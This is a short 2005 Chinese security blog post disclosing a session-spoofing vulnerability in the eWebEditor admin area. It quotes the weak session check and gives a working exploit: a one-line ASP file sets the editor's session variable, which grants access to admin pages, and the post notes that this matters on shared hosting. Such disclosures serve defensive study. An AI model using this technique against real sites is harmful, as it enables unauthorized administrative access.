林网博客

探讨计算机网络安全 拓展计算机网络应用

« Windows环境中Kill掉Oracle线程渗透之简单任务 »

2005-12-3 18:49:21

eWebEditor session欺骗漏洞

eWebEditor在线编辑器
漏洞文件:Admin_Private.asp
漏洞语句:<%

If Session("eWebEditor_User") = "" Then
Response.Redirect "admin_login.asp"
Response.End
End If

只判断了session,没有判断cookies和路径的验证问题。
漏洞利用:
新建一个h4x0r.asp内容如下:
<%Session("eWebEditor_User") = "11111111"%>
访问h4x0r.asp,再访问后台任何文件,for example:Admin_Default.asp

漏洞影响:虚拟主机的克星.





本文链接地址:http://www.linwan.net.cn/archives/818.html
原创文章如转载,请注明:转载自林网博客 [ http://www.linwan.net.cn/ ]
分类:技术文摘 | 评论:2 | 浏览: |

  • 相关文章():

发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

订阅博客

  • 订阅我的博客:订阅我的博客
  • 通过Google订阅本站
  • 通过抓虾订阅本站
  • 通过鲜果订阅本站
  • 通过bloglines订阅本站
  • 订阅本站到飞豆
  • 订阅本站到哪吒
  • 订阅到有道阅读
  • 通过电子邮件订阅本站

热文排行

最新评论及回复

最新文章

林海谐缘软件区新贴

林海谐缘网络区新贴

联系邮箱:我的信箱地址,Powered By Z-Blog 1.8 Spirit Build 80710

本站采用创作共用版权协议, 要求署名、非商业用途和保持一致. 转载本站内容必须也遵循“署名-非商业用途-保持一致”的创作共用协议.